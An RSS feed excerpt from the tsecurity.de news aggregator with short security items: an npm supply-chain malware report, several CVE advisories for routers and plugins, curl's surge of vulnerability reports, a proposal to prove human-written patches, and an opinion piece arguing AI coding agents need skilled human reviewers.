<description><![CDATA[Über ein gekapertes Maintainer-Konto schleust die Hackergruppe TeamPCP manipulierte AntV-npm-Pakete in den öffentlichen Index. Der Schadcode liest CI/CD-Secrets, GitHub-Token und Cloud-Anmeldedaten aus Build-Umgebungen aus und breitet sich wurmartig auf weitere Repositories aus. Betroffen sind un...]]></description>
<link>https://tsecurity.de/de/3549840/it-security-nachrichten/schadcode-stiehlt-cicd-secrets-aus-github-und-npm/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3549840/it-security-nachrichten/schadcode-stiehlt-cicd-secrets-aus-github-und-npm/</guid>
<pubDate>Wed, 27 May 2026 07:22:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Über ein gekapertes Maintainer-Konto schleust die Hackergruppe TeamPCP manipulierte AntV-npm-Pakete in den öffentlichen Index. Der Schadcode liest CI/CD-Secrets, GitHub-Token und Cloud-Anmeldedaten aus Build-Umgebungen aus und breitet sich wurmartig auf weitere Repositories aus. Betroffen sind unter anderem echarts-for-react mit über einer Million wöchentlicher Downloads.]]></content:encoded>
</item>
<item>
<title><![CDATA[linux desktop relies alot on trust]]></title>
<description><![CDATA[when you use a distro, you need to trust that the developers will not push an update with malware. before it's noticed, many people will already have updated when you use an AUR package, you often need to trust the maintainer too. sure, you can check the pkgbuild, but many don't do it. the fact t...]]></description>
<link>https://tsecurity.de/de/3549592/linux-tipps/linux-desktop-relies-alot-on-trust/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3549592/linux-tipps/linux-desktop-relies-alot-on-trust/</guid>
<pubDate>Wed, 27 May 2026 03:54:10 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>when you use a distro, you need to trust that the developers will not push an update with malware. before it's noticed, many people will already have updated</p> <p>when you use an AUR package, you often need to trust the maintainer too. sure, you can check the pkgbuild, but many don't do it.</p> <p>the fact that malware cases in linux are pretty rare, even with this, is pretty impressive imo</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/TheNavyCrow"> /u/TheNavyCrow </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1tolhle/linux_desktop_relies_alot_on_trust/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1tolhle/linux_desktop_relies_alot_on_trust/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-32841 | Edimax GS-5008PL up to 1.00.54 excessive reliance on global variables]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, has been found in Edimax GS-5008PL up to 1.00.54. The impacted element is an unknown function. This manipulation causes excessive reliance on global variables. This vulnerability only affects products that are no longer supported by the maintaine...]]></description>
<link>https://tsecurity.de/de/3549543/sicherheitsluecken/cve-2026-32841-edimax-gs-5008pl-up-to-10054-excessive-reliance-on-global-variables/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3549543/sicherheitsluecken/cve-2026-32841-edimax-gs-5008pl-up-to-10054-excessive-reliance-on-global-variables/</guid>
<pubDate>Wed, 27 May 2026 02:38:53 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, has been found in <a href="https://vuldb.com/product/edimax:gs-5008pl">Edimax GS-5008PL up to 1.00.54</a>. The impacted element is an unknown function. This manipulation causes excessive reliance on global variables. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2026-32841">CVE-2026-32841</a>. The attack is possible to be carried out remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-0625 | D-Link DSL-2640B/DSL-2740R/DSL-2780B/DSL-526B Endpoint dnscfg.cgi os command injection (EUVD-2026-0944)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in D-Link DSL-2640B, DSL-2740R, DSL-2780B and DSL-526B. Affected by this vulnerability is an unknown functionality of the file dnscfg.cgi of the component Endpoint. Such manipulation leads to os command injection. This vulnerability onl...]]></description>
<link>https://tsecurity.de/de/3549420/sicherheitsluecken/cve-2026-0625-d-link-dsl-2640bdsl-2740rdsl-2780bdsl-526b-endpoint-dnscfgcgi-os-command-injection-euvd-2026-0944/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3549420/sicherheitsluecken/cve-2026-0625-d-link-dsl-2640bdsl-2740rdsl-2780bdsl-526b-endpoint-dnscfgcgi-os-command-injection-euvd-2026-0944/</guid>
<pubDate>Wed, 27 May 2026 00:54:56 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, was found in <a href="https://vuldb.com/product/d-link:dsl-2640b">D-Link DSL-2640B, DSL-2740R, DSL-2780B and DSL-526B</a>. Affected by this vulnerability is an unknown functionality of the file <em>dnscfg.cgi</em> of the component <em>Endpoint</em>. Such manipulation leads to os command injection. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is traded as <a href="https://vuldb.com/cve/CVE-2026-0625">CVE-2026-0625</a>. The attack may be launched remotely. Furthermore, there is an exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[AI coding agents need good software engineers]]></title>
<description><![CDATA[The backlash was inevitable. For the past year, Silicon Valley has been telling us that software development is on the verge of becoming a prompt-and-ship exercise. You know, just describe what you want and let an AI coding agent build it. Sure, maybe you could keep a few token senior engineers a...]]></description>
<link>https://tsecurity.de/de/3549308/ai-nachrichten/ai-coding-agents-need-good-software-engineers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3549308/ai-nachrichten/ai-coding-agents-need-good-software-engineers/</guid>
<pubDate>Tue, 26 May 2026 23:32:50 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The backlash was inevitable. For the past year, Silicon Valley has been telling us that software development is on the verge of becoming a prompt-and-ship exercise. You know, just describe what you want and let an AI coding agent build it. Sure, maybe you could keep a few token senior engineers around to bless the output…or maybe not. I mean, Google’s Sundar Pichai <a href="https://blog.google/company-news/inside-google/message-ceo/alphabet-earnings-q1-2026/">says 75% of its new code is now AI-generated</a> and reviewed by engineers, up sharply from earlier levels.</p>



<p>Hurray! Right??? Well…</p>



<p><em>The Wall Street Journal</em> recently <a href="https://www.wsj.com/tech/ai/vibe-coding-slop-ai-tools-e6a99394">highlighted warnings from Mario Zechner and Armin Ronacher</a>, two engineers behind core pieces of the popular OpenClaw AI agent, who argue that AI coding tools are flooding software with what they call “vibe slop.” Their complaint is that too many people are using AI to skip the parts of software development that actually matter: design, judgment, testing, ownership, and deep understanding of the system being changed.</p>



<p>This is worth taking seriously. When people who helped build the tools used by millions start warning that those same tools can produce buggy, potentially dangerous software at industrial scale, it’s probably time to rethink some of the assumptions fueling the AI wave.</p>



<p>Rethink, not reject.</p>



<p>The right answer isn’t “AI coding is bad.” That’s silly. AI coding is powerful in roughly the same way power tools are powerful. They help skilled people do more, faster. They also help unskilled or careless people make bigger mistakes with greater confidence. That’s the enterprise AI story in miniature.</p>



<h2 class="wp-block-heading"><a></a>Nearly correct is still very wrong</h2>



<p><a href="https://www.infoworld.com/article/4033109/bridging-the-trust-gap-in-ai-driven-development.html">I’ve made a related argument about the real cost</a> of “nearly correct” AI code. The trouble was never that large language models could produce obviously broken garbage. If they did, we’d catch it and move on. The trouble is that they very quickly produce plausible output. Fast and plausible is exactly the kind of wrong that slips into production.</p>



<p>It’s important to realize that generating code has never been the hard part of software. As <a href="https://www.infoworld.com/article/4094801/software-development-has-a-996-problem.html">Honeycomb Founder and CTO Charity Majors puts it</a>, being a great software engineer “has far more to do with your ability to understand, maintain, explain, and manage a large body of software in production over time, as well as the ability to translate business needs into technical implementation” than to simply churn out lots of code. <a href="https://www.infoworld.com/article/2336925/ai-still-has-a-ways-to-go-in-code-refactoring.html">As I’ve written before</a>, speed of development is rarely the right metric. Developers spend much of their time understanding existing systems, not simply adding lines to them.</p>



<p>AI hasn’t eliminated the need for that hard work. What it <em>has</em> done is make it easier to foolishly skip it. </p>



<p>That’s true beyond software, too. I use AI constantly in my work. I’ll use AI to rough out slides we use to train sales teams, for example, or to synthesize feedback from customers. AI gives me a starting point, like a first draft on a memo that may be 80% correct. That’s a real gift. But a final draft that’s only 80% right is a liability, so I have to coach and oversee the agents. It’s real work, albeit different work from what I’d done before.</p>



<h2 class="wp-block-heading">The problem is abdication</h2>



<p>The dumbest version of the AI coding debate asks whether AI will replace developers. The better question is <em>what kind of developer</em> does AI reward? It doesn’t reward the person who blindly accepts output. Instead, it rewards the person who can tell, quickly and accurately, whether the output fits the system, the security model, the performance envelope, the user need, and the organization’s standards. In other words, AI rewards experience; it rewards people who know what “good” looks like.</p>



<p>This is why fleets of autonomous coding agents make me nervous. Not because agents can’t be useful, but because responsibility doesn’t scale the way prompts do. A developer can review one AI-generated change. Maybe five. Maybe 20 if the changes are small and the tests are strong. But when a company starts celebrating dozens or hundreds of agents churning out pull requests, issues, tests, migrations, and fixes, the obvious question is: Who actually understands what’s happening?</p>



<p>If the answer is “another agent,” I’m sorry but we’re back where we started. Open source maintainers are already living with the downside. GitHub has been weighing tighter pull request controls after maintainers warned that a surge of low-quality, often AI-generated contributions are overwhelming projects. InfoWorld <a href="https://www.infoworld.com/article/4127156/github-eyes-restrictions-on-pull-requests-to-rein-in-ai-based-code-deluge-on-maintainers.html">reported that GitHub has considered stronger filters</a> and maintainer controls to stem the flood.</p>



<p>This is the ugly economics of AI slop. It’s cheap to generate but expensive to review.</p>



<h2 class="wp-block-heading"><a></a>Friction is the point</h2>



<p>Ronacher has been making a related point with admirable clarity. In his talk, <a href="https://www.youtube.com/watch?v=_Zcw_sVF6hU">“The Friction Is Your Judgment,”</a> he and Cristina Poncela argue that agent-generated code has a way of drifting toward the locally convenient answer. Catch the exception, add a fallback, paper over the weird edge case, keep the demo moving. Each change can look reasonable in isolation, but the problem is what happens after a hundred of them accrete across the codebase, quietly making the system harder to reason about.</p>



<p>That sounds right to me. Friction isn’t an enemy; rather, it’s where your judgment lives.</p>



<p>This is why the “human in the loop” language, tired as it has become, still matters. But the phrase only means anything if the human is both paying attention and capable of judging the work. A junior developer accepting generated code because it passes the first test doesn’t solve the problem. Nor does a senior developer “reviewing” a flood of agent-written pull requests at a speed that makes real review impossible.</p>



<p>The safeguard is not a person vaguely near the loop. No, it’s expertise applied deliberately, with systems that force accountability rather than assume it. For developers, AI is strongest when it’s used for bounded tasks like generating tests or explaining unfamiliar code. In the same way, it’s weaker when asked to make broad architectural decisions or infer business rules that live in people’s heads rather than in the repository.</p>



<p>For managers, the worst possible metric is “percentage of code generated by AI.” That’s like measuring a newsroom by the percentage of sentences drafted by autocomplete. Who cares? The real questions are whether defects are down, delivery is faster, incidents are fewer, and customers are happier.</p>



<p>The<a href="https://dora.dev/dora-report-2025/"> </a><a href="https://dora.dev/dora-report-2025/">2025 DORA report</a> on the state of AI-assisted software development gets at this more usefully: AI tends to amplify an organization’s existing strengths and weaknesses. If you have strong tests, clear ownership, disciplined review, good observability, and fast rollback, AI can make you better. If you have weak engineering hygiene, AI can make you worse faster.</p>



<p>In other words, AI doesn’t eliminate the need for engineering discipline. It raises the price of not having it.</p>



<h2 class="wp-block-heading"><a></a>Guardrails can’t be a memo</h2>



<p>Discipline is necessary, but for an enterprise, it isn’t sufficient. You cannot make tens of thousands of engineers, analysts, marketers, lawyers, and salespeople reliably “slow down and check the work” through good intentions and a memo. At scale, keeping a human in the loop has to be enforced by architecture, not good intentions.</p>



<p>In practice this means baking guardrails into the systems agents touch, like <a href="https://www.csoonline.com/article/518296/what-is-iam-identity-and-access-management-explained.html">identity</a>, <a href="https://www.infoworld.com/article/2263668/data-wrangling-and-exploratory-data-analysis-explained.html">data governance</a>, and <a href="https://www.infoworld.com/article/2262666/what-is-observability-software-monitoring-on-steroids.html">observability</a>. This is where I’ll risk sounding like I work where I work (Oracle). The genuinely interesting shift I see across the industry, and yes, where Oracle is placing its bet, is pushing more of those controls down into the data layer itself, so agents operate against governed enterprise data rather than as clever scripts holding the keys to production.</p>



<p>That’s not as exciting as saying agents will write all your code but guess what? That’s <em>good</em>. In enterprise AI, “boring” is good.</p>



<p>So how much should it matter to enterprises that Google says 75% of their new code comes from AI? It may well be true, but Google also has some of the best engineers in the world reviewing that output. That’s the part of the story too many AI boosters skip but shouldn’t. Humans are the best way to make AI work.</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Arias: Human proof for FOSS contributions]]></title>
<description><![CDATA[Rodrigo Arias Mallo, maintainer of the Dillo web browser, has written a
blog post
with a proposal on one way to ensure that a contribution is written by
a human and not AI; he suggests asking new contributors to record
their programming session using asciinema.


In the same way that LLMs generat...]]></description>
<link>https://tsecurity.de/de/3548920/linux-tipps/arias-human-proof-for-foss-contributions/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3548920/linux-tipps/arias-human-proof-for-foss-contributions/</guid>
<pubDate>Tue, 26 May 2026 19:55:07 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Rodrigo Arias Mallo, maintainer of the <a href="https://dillo-browser.org/">Dillo</a> web browser, has written a
<a href="https://dillo-browser.org/lab/human-proof/">blog post</a>
with a proposal on one way to ensure that a contribution is written by
a human and not AI; he suggests asking new contributors to record
their programming session using <a href="https://asciinema.org/">asciinema</a>.</p>

<blockquote class="bq">
<p>In the same way that LLMs generate patches, they can also generate
the asciinema recordings themselves. Then, the contributors can lie to
the reviewers pretending to have made the edits. Perhaps surprisingly,
this is not a easy task for LLMs, at least from my observations. The
corpus of recordings of developers making mistakes and thinking the
whole process of editing a file is not as large as the corpus of FOSS
programs and patches in which to train an LLM. During my very simple
tests I haven't been able to generate an asciinema session that
remotely resembles what I would expect from a human, and even less so
from a human with a nice editor theme and editing an existing Dillo
source file.</p>
</blockquote>

<p>The Dillo project is not yet requiring asciinema recordings, but he
said that he would like to test the theory further. LWN <a href="https://lwn.net/Articles/1053355/">covered</a> asciinema in
January 2026.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2012-10027 | WP-Property Plugin up to 1.35.0 on WordPress uploadify.php unrestricted upload (Exploit 18987 / EUVD-2012-6569)]]></title>
<description><![CDATA[A vulnerability categorized as critical has been discovered in WP-Property Plugin up to 1.35.0 on WordPress. Affected by this issue is some unknown functionality of the file uploadify.php. The manipulation results in unrestricted upload. This vulnerability only affects products that are no longer...]]></description>
<link>https://tsecurity.de/de/3548439/sicherheitsluecken/cve-2012-10027-wp-property-plugin-up-to-1350-on-wordpress-uploadifyphp-unrestricted-upload-exploit-18987-euvd-2012-6569/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3548439/sicherheitsluecken/cve-2012-10027-wp-property-plugin-up-to-1350-on-wordpress-uploadifyphp-unrestricted-upload-exploit-18987-euvd-2012-6569/</guid>
<pubDate>Tue, 26 May 2026 17:10:11 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">critical</a> has been discovered in <a href="https://vuldb.com/product/wp-property_plugin">WP-Property Plugin up to 1.35.0</a> on WordPress. Affected by this issue is some unknown functionality of the file <em>uploadify.php</em>. The manipulation results in unrestricted upload. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2012-10027">CVE-2012-10027</a>. The attack may be performed from remote. In addition, an exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2013-10050 | D-Link DIR-300 Rev A/DIR-615 Rev D CGI Endpoint tools_vct.xgi pingIp os command injection (EUVD-2013-7273 / EDB-25024)]]></title>
<description><![CDATA[A vulnerability described as critical has been identified in D-Link DIR-300 Rev A and DIR-615 Rev D. This affects an unknown function of the file tools_vct.xgi of the component CGI Endpoint. Executing a manipulation of the argument pingIp can lead to os command injection. This vulnerability only ...]]></description>
<link>https://tsecurity.de/de/3548433/sicherheitsluecken/cve-2013-10050-d-link-dir-300-rev-adir-615-rev-d-cgi-endpoint-toolsvctxgi-pingip-os-command-injection-euvd-2013-7273-edb-25024/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3548433/sicherheitsluecken/cve-2013-10050-d-link-dir-300-rev-adir-615-rev-d-cgi-endpoint-toolsvctxgi-pingip-os-command-injection-euvd-2013-7273-edb-25024/</guid>
<pubDate>Tue, 26 May 2026 17:10:00 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">critical</a> has been identified in <a href="https://vuldb.com/product/d-link:dir-300_rev_a">D-Link DIR-300 Rev A and DIR-615 Rev D</a>. This affects an unknown function of the file <em>tools_vct.xgi</em> of the component <em>CGI Endpoint</em>. Executing a manipulation of the argument <em>pingIp</em> can lead to os command injection. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability appears as <a href="https://vuldb.com/cve/CVE-2013-10050">CVE-2013-10050</a>. The attack may be performed from remote. In addition, an exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Stenberg: The pressure]]></title>
<description><![CDATA[Curl maintainer Daniel Stenberg writes about
the stress of keeping up with the current flood of security reports.


	This is a never-before seen or experienced pressure on the curl
	project and its security team members. An avalanche of high
	priority work that trumps all other things in the proj...]]></description>
<link>https://tsecurity.de/de/3548270/linux-tipps/stenberg-the-pressure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3548270/linux-tipps/stenberg-the-pressure/</guid>
<pubDate>Tue, 26 May 2026 16:14:05 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Curl maintainer Daniel Stenberg <a href="https://daniel.haxx.se/blog/2026/05/26/the-pressure/">writes about
the stress</a> of keeping up with the current flood of security reports.
<p>
</p><blockquote class="bq">
	This is a never-before seen or experienced pressure on the curl
	project and its security team members. An avalanche of high
	priority work that trumps all other things in the project that is
	primarily mental because we certainly could ignore them all if we
	wanted, but we feel a responsibility, we have a conscience and we
	are proud about our work. We feel obliged to fix security problems
	in the software we have helped shipped to every device on the
	globe. This is personal to us.
<p>
	With about half the release cycle left until the pending release
	ships, we already have twelve <i>confirmed vulnerabilities</i>
	meaning twelve pending CVE announcements. That's a new project
	record and it also means we will reach <i>thirty</i> published CVEs
	in 2026 even before half the calendar year has passed. The
	projected total amount of curl CVEs published through the whole
	year is therefore at least double this number!
</p></blockquote>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-42627 | Arm ArmNN up to 2026-03-27 TFLite armnn/Tensor.cpp GetNumElements integer overflow (Nessus ID 316557)]]></title>
<description><![CDATA[A vulnerability labeled as problematic has been found in Arm ArmNN up to 2026-03-27. Affected by this issue is the function TensorShape::GetNumElements of the file armnn/Tensor.cpp of the component TFLite Handler. The manipulation results in integer overflow. This vulnerability only affects produ...]]></description>
<link>https://tsecurity.de/de/3547835/sicherheitsluecken/cve-2026-42627-arm-armnn-up-to-2026-03-27-tflite-armnntensorcpp-getnumelements-integer-overflow-nessus-id-316557/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3547835/sicherheitsluecken/cve-2026-42627-arm-armnn-up-to-2026-03-27-tflite-armnntensorcpp-getnumelements-integer-overflow-nessus-id-316557/</guid>
<pubDate>Tue, 26 May 2026 13:54:12 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/arm:armnn">Arm ArmNN up to 2026-03-27</a>. Affected by this issue is the function <code>TensorShape::GetNumElements</code> of the file <em>armnn/Tensor.cpp</em> of the component <em>TFLite Handler</em>. The manipulation results in integer overflow. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is identified as <a href="https://vuldb.com/cve/CVE-2026-42627">CVE-2026-42627</a>. The attack is only possible with local access. There is not any exploit available.]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,11ms -->